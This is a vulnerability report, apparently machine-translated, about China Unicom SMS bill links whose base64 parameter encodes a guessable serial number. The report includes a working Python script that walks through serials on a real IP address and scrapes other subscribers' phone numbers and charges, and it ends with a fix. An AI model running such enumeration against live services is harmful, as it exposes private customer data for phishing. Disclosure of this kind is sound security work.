China Unicom SMS phone bill notification link leakage user information

China Unicom SMS phone bill notification link leakage user information

China Unicom SMS Call Notification provides a link. By changing the URL, You can query the purchase records of other users' mobile phone numbers (which may be accurate to the month)

The obtained information can be used for further deception and phishing of mobile phone users. Leaked mobile phone numbers and consumption records can also be used to detect the value of users' spam messages.

Receive SMS call reminder notification (to protect your privacy, you have already entered the code)


 

Link: http: // 114.247.0.103: 8080/bill/d. h? Attrs = XXXXXXXX



The IP address + port URL is directly used, which means phishing messages are used. After obtaining the Page code with curl, I found that it was actually an official page ...... Fees are correct, and wo.cn resources (js/css or something) are referenced)



Considering that the attr attribute of the link is very base64 encoded, try to decode it:


 

The discovery is composed of a simple date and serial number. After verification, you can simply modify the serial number to find the phone number and phone number of another person.

Due to time constraints, only a very small amount of information is captured for the time being. I believe that a lot of information can be found in depth.



Verification script


 

#!/usr/bin/env python# -*- encoding: utf-8 -*-import hashlibimport httplibimport refrom base64 import b64encode, b64decodeHOST = "114.247.0.103:8080"PATH = """/bill/d.h?attrs="""PROG = re.compile('<div class="mobile">[0-9]+<')RMB_PROG = re.compile('<div class="rmb">.*<')# RMB_PROG = re.compile('<div class="rmb">[0-9]+\.[0-9]+<')def get(path):    conn = httplib.HTTPConnection(HOST, timeout=3)    conn.request("GET", path)    rsp = conn.getresponse()    print(rsp.status, rsp.reason)    text = rsp.read()    match = PROG.search(text)        if match is not None:        span = match.span()        print(text[span[0]:span[1]])    match = RMB_PROG.search(text)    if match is not None:        span = match.span()        print(text[span[0]:span[1]])    # with open("t.log", "wb") as fp:    #     fp.write(rsp.read())def gen_serial():    # for i in range(108350, 118350):    for i in range(1084, 1088):        yield str(i) + "5020141225020141109713411"def main():    for s in gen_serial():        get(PATH + b64encode(s))if __name__ == "__main__":    main()

Verification Result


 

 

Solution:

The identifier string used in the URL cannot expose any business/user-related information, and cannot be simply collided with the correct identifier string